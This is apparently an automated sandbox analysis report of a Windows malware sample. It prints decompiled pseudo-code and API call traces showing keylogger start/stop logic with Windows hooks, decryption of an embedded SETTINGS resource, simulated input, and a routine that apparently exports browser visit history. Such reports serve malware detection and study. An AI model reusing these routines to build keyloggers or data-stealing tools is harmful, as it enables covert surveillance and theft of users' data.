                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@$?c_str@?$basic_string@D@2@@std@@D@std@@G@std@@$G@2@@std@@$?size@?$basic_string@$??8std@@G@2@@0@V?$basic_string@$??4?$basic_string@CloseOpenQuerySleepV01@Value
                                                                                • String ID: .exe$WDH$exepath$open$temp_
                                                                                • API String ID: 3885969548-3088914985
                                                                                • Opcode ID: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                                                                • Instruction ID: 60cde0a6a469a490c1b109ae90cccba4ec5744e34f2951ce39ed213dd0605107
                                                                                • Opcode Fuzzy Hash: 167acccddfbce7862f75a81ffa886adb04af34d28bc9aa891ffc650833d03850
                                                                                • Instruction Fuzzy Hash: 2001D233740314A7DB0097949C59FEB7368DF84351F2040B7BA56A61D1DFB858D187AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E00405CCA(struct HHOOK__** __ecx) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				void* _t9;
                                                                                				struct HHOOK__* _t16;
                                                                                				struct HHOOK__** _t30;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t30 = __ecx;
                                                                                				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                                                                					_t9 = 0;
                                                                                				} else {
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                                                                					E00405DD3(__ecx);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                                                                					E0041203B("[INFO]",  &_v6, "Online Keylogger Stopped",  &_v5, "Online Keylogger Stopped");
                                                                                					_t30[0xf] = 0;
                                                                                					_t6 =  &(_t30[0xd]); // 0x0
                                                                                					_t30[0xa] = 0;
                                                                                					CloseHandle( *_t6);
                                                                                					if(_t30[0xf] == 0) {
                                                                                						_t16 =  *_t30;
                                                                                						if(_t16 != 0) {
                                                                                							UnhookWindowsHookEx(_t16);
                                                                                							 *_t30 = 0;
                                                                                						}
                                                                                					}
                                                                                					_t9 = 1;
                                                                                				}
                                                                                				return _t9;
                                                                                			}









                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?,?,0040D1F8,0040D2A6,00000001), ref: 00405CE9
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Stopped,?), ref: 00405D00
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405D14
                                                                                  • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                                                                  • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                                                                  • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                                                                  • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                                                                  • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405D2B
                                                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405D3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@CloseEventHandleHookUnhookV01@@V10@0@Windowsfreemallocprintfsprintf
                                                                                • String ID: Online Keylogger Stopped$[INFO]
                                                                                • API String ID: 2254939683-2146459034
                                                                                • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                                                                • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                                                                • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                                                                • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                                                                • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InputSend
                                                                                • String ID:
                                                                                • API String ID: 3431551938-0
                                                                                • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                                                                • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                                                                • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                                                                • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@??1?$basic_string@$G@1@@V01@@$G@2@@0@Hstd@@V01@V10@V?$basic_string@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 2253030544-0
                                                                                • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                                                                • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                                                                • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00409823(intOrPtr _a4) {
                                                                                				unsigned int _v8;
                                                                                				signed char* _v12;
                                                                                				char _v13;
                                                                                				void* _v20;
                                                                                				void* _v24;
                                                                                				char _v40;
                                                                                				void* _v56;
                                                                                				char _v1080;
                                                                                				void* _t36;
                                                                                				signed int _t38;
                                                                                				signed int _t42;
                                                                                				int _t51;
                                                                                				signed int _t54;
                                                                                				signed int _t55;
                                                                                				signed int _t66;
                                                                                				signed char* _t76;
                                                                                				void* _t83;
                                                                                				void* _t88;
                                                                                				void* _t89;
                                                                                
                                                                                				_v12 = _v12 & 0x00000000;
                                                                                				_v8 = E00409D02( &_v12);
                                                                                				_t51 =  *_v12 & 0x000000ff;
                                                                                				_t36 = malloc(_t51);
                                                                                				_t76 = _v12;
                                                                                				_t54 = _t51;
                                                                                				_t7 = _t76 + 1; // 0x1
                                                                                				_t88 = _t7;
                                                                                				_v24 = _t36;
                                                                                				_t55 = _t54 >> 2;
                                                                                				memcpy(_t36, _t88, _t55 << 2);
                                                                                				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                                                                				_t83 = malloc(_v8);
                                                                                				_t42 = _v12;
                                                                                				_v20 = _t83;
                                                                                				_t20 = _t42 + 1; // 0x1
                                                                                				_t89 = _t51 + _t20;
                                                                                				_t66 = _v8 >> 2;
                                                                                				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
                                                                                				E00402F9B( &_v1080, _v24, _t51);
                                                                                				E0040309E( &_v1080,  &_v40, _v20, _v8);
                                                                                				free(_v20);
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _a4;
                                                                                			}























                                                                                APIs
                                                                                  • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                                                                  • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                                                                  • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                                                                  • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                                                                • malloc.MSVCRT ref: 00409846
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                                                                • malloc.MSVCRT ref: 00409898
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                                                                • String ID:
                                                                                • API String ID: 531887698-0
                                                                                • Opcode ID: 537d00d0b91bc4c659ca58b4795d880a0a3ac7295881093653a66409a3579479
                                                                                • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                                                                • Opcode Fuzzy Hash: 537d00d0b91bc4c659ca58b4795d880a0a3ac7295881093653a66409a3579479
                                                                                • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				void* _t18;
                                                                                				void* _t20;
                                                                                				intOrPtr _t39;
                                                                                
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t39 =  *__eax;
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				_t18 = _t39 - 0x9b;
                                                                                				if(_t18 == 0) {
                                                                                					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
                                                                                					 *0x41b288 = 1;
                                                                                					_t20 = E0040180C( &_v20, __eflags, 0);
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                					E004020C2(0x41b240, 0x9c, _t20);
                                                                                				} else {
                                                                                					if(_t18 == 0) {
                                                                                						E00401B26();
                                                                                					}
                                                                                				}
                                                                                				E004017DD( &_v20);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}









                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00401A80
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                                                                  • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                                                                  • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                                                                  • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                                                                  • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
